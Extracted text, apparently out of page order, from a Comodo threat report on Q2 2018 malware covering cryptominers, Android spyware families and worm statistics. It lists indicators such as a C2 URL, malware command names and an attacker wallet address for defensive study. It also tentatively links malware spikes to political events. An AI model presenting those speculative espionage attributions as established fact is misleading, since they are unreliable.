71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
